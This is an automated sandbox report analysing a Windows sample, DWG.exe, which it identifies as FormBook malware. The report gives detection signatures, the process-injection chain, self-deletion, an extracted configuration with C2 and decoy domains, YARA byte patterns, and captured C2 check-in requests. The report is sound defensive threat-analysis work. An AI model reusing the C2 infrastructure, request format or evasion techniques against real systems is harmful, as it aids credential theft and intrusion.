Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report DWG.exe

Overview

General Information

Sample Name:DWG.exe
Analysis ID:510733
MD5:ff882802d113ed02fa070c496f89d797
SHA1:aad1eed1c53f1d33ab52e13442b036bfeee91f1b
SHA256:4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Sigma detected: Suspect Svchost Activity
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Self deletion via cmd delete
Sigma detected: Suspicious Svchost Process
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Checks if the current process is being debugged
Potential key logger detected (key state polling based)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DWG.exe (PID: 6272 cmdline: 'C:\Users\user\Desktop\DWG.exe' MD5: FF882802D113ED02FA070C496F89D797)
    • DWG.exe (PID: 6240 cmdline: C:\Users\user\Desktop\DWG.exe MD5: FF882802D113ED02FA070C496F89D797)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • svchost.exe (PID: 6564 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
          • cmd.exe (PID: 6584 cmdline: /c del 'C:\Users\user\Desktop\DWG.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.elsist.online/xzes/"], "decoy": ["dent-works.com", "theravewizards.com", "venkataramanagraphics.com", "overway.store", "alignatura.com", "boggbogs.com", "senerants.tech", "muintel.net", "bestplacementconsultancy.com", "trippresso.com", "communication.services", "xn--maraaestudio-dhb.com", "beandhira.com", "lochnas.com", "update-mind.com", "cpcacursos.com", "metaverse-coaching.com", "skindefense5.com", "distressedthenblessed.com", "alphaore.com", "extrobility.com", "sandyanmax.com", "jntycy.com", "becomingalice.com", "printyourdays.com", "fallet-official.com", "hcbg.online", "era575.com", "dalainstitute.info", "7looks-mocha-totalbeauty.com", "spydasec.com", "vote4simone.net", "cannabeeswax.com", "coalitionloop.com", "skywalkerpressonline.com", "healthybalancedliving.com", "mylistg.com", "bookbqconspicuous.com", "mylyk.net", "mylindiss.com", "xn--80akukchh.xn--80asehdb", "captekbrasil.com", "joannhydeyoga.com", "monenee.xyz", "nishantmohapatra.com", "mindbodyweightlossmethod.com", "sxjcfw.com", "wilbertluna.com", "inclutel.com", "knowsyourdream.com", "uk-gaming.com", "maihengkeji.online", "fragrant-nest.com", "ubfodessa.com", "vipinindustries.com", "narcozland.com", "heros-coaching.com", "austeregomrqg.xyz", "eleonoritalia.com", "publiccoins.online", "dashmints.com", "thebrandstudiointernational.com", "thaikindee.com", "punkidz.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x7608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x79a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x136b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x131a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x137b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1392f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x83ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1241c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x18ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x19c4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.DWG.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.DWG.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.DWG.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
        5.0.DWG.exe.400000.1.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.DWG.exe.400000.1.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspect Svchost ActivityShow sources
          Source: Process startedAuthor: David Burkett: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\SysWOW64\svchost.exe, CommandLine: C:\Windows\SysWOW64\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3352, ProcessCommandLine: C:\Windows\SysWOW64\svchost.exe, ProcessId: 6564

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.elsist.online/xzes/"], "decoy": ["dent-works.com", "theravewizards.com", "venkataramanagraphics.com", "overway.store", "alignatura.com", "boggbogs.com", "senerants.tech", "muintel.net", "bestplacementconsultancy.com", "trippresso.com", "communication.services", "xn--maraaestudio-dhb.com", "beandhira.com", "lochnas.com", "update-mind.com", "cpcacursos.com", "metaverse-coaching.com", "skindefense5.com", "distressedthenblessed.com", "alphaore.com", "extrobility.com", "sandyanmax.com", "jntycy.com", "becomingalice.com", "printyourdays.com", "fallet-official.com", "hcbg.online", "era575.com", "dalainstitute.info", "7looks-mocha-totalbeauty.com", "spydasec.com", "vote4simone.net", "cannabeeswax.com", "coalitionloop.com", "skywalkerpressonline.com", "healthybalancedliving.com", "mylistg.com", "bookbqconspicuous.com", "mylyk.net", "mylindiss.com", "xn--80akukchh.xn--80asehdb", "captekbrasil.com", "joannhydeyoga.com", "monenee.xyz", "nishantmohapatra.com", "mindbodyweightlossmethod.com", "sxjcfw.com", "wilbertluna.com", "inclutel.com", "knowsyourdream.com", "uk-gaming.com", "maihengkeji.online", "fragrant-nest.com", "ubfodessa.com", "vipinindustries.com", "narcozland.com", "heros-coaching.com", "austeregomrqg.xyz", "eleonoritalia.com", "publiccoins.online", "dashmints.com", "thebrandstudiointernational.com", "thaikindee.com", "punkidz.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: DWG.exeVirustotal: Detection: 50%Perma Link
          Source: DWG.exeReversingLabs: Detection: 37%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: DWG.exeAvira: detected
          Machine Learning detection for sampleShow sources
          Source: DWG.exeJoe Sandbox ML: detected
          Source: 5.2.DWG.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.svchost.exe.900000.1.unpackAvira: Label: TR/Patched.Gen
          Source: 5.0.DWG.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.DWG.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 10.2.svchost.exe.3c3796c.4.unpackAvira: Label: TR/Patched.Gen
          Source: DWG.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: wntdll.pdbUGP source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp, svchost.exe, 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: DWG.exe, svchost.exe
          Source: Binary string: svchost.pdb source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
          Source: Binary string: svchost.pdbUGP source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00436310 FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,0_2_00436310
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00449B06 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,0_2_00449B06
          Source: C:\Users\user\Desktop\DWG.exeCode function: 4x nop then pop edi5_2_0040C37A
          Source: C:\Users\user\Desktop\DWG.exeCode function: 4x nop then pop edi5_2_0040C3CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi10_2_02F1C3CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi10_2_02F1C37A

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.hcbg.online
          Source: C:\Windows\explorer.exeDomain query: www.knowsyourdream.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.187.31.159 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 154.216.113.38 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.jntycy.com
          Source: C:\Windows\explorer.exeDomain query: www.publiccoins.online
          Source: C:\Windows\explorer.exeDomain query: www.theravewizards.com
          Source: C:\Windows\explorer.exeDomain query: www.thebrandstudiointernational.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 5.157.87.204 80Jump to behavior
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.elsist.online/xzes/
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global trafficHTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1Host: www.jntycy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1Host: www.publiccoins.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.thebrandstudiointernational.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.theravewizards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 198.187.31.159 198.187.31.159
          Source: Joe Sandbox ViewIP Address: 198.54.117.215 198.54.117.215
          Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmpString found in binary or memory: http://push.zhanzhang.baidu.com/push.js
          Source: explorer.exe, 00000006.00000000.367204188.000000000EEB1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mi
          Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmpString found in binary or memory: https://www.yourhosting.nl/parkeerpagina.html
          Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: unknownDNS traffic detected: queries for: www.jntycy.com
          Source: global trafficHTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1Host: www.jntycy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1Host: www.publiccoins.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.thebrandstudiointernational.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.theravewizards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00446387 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00446387
          Source: C:\Users\user\Desktop\DWG.exeCode function: 0_2_00448BC4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00448BC4

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: DWG.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
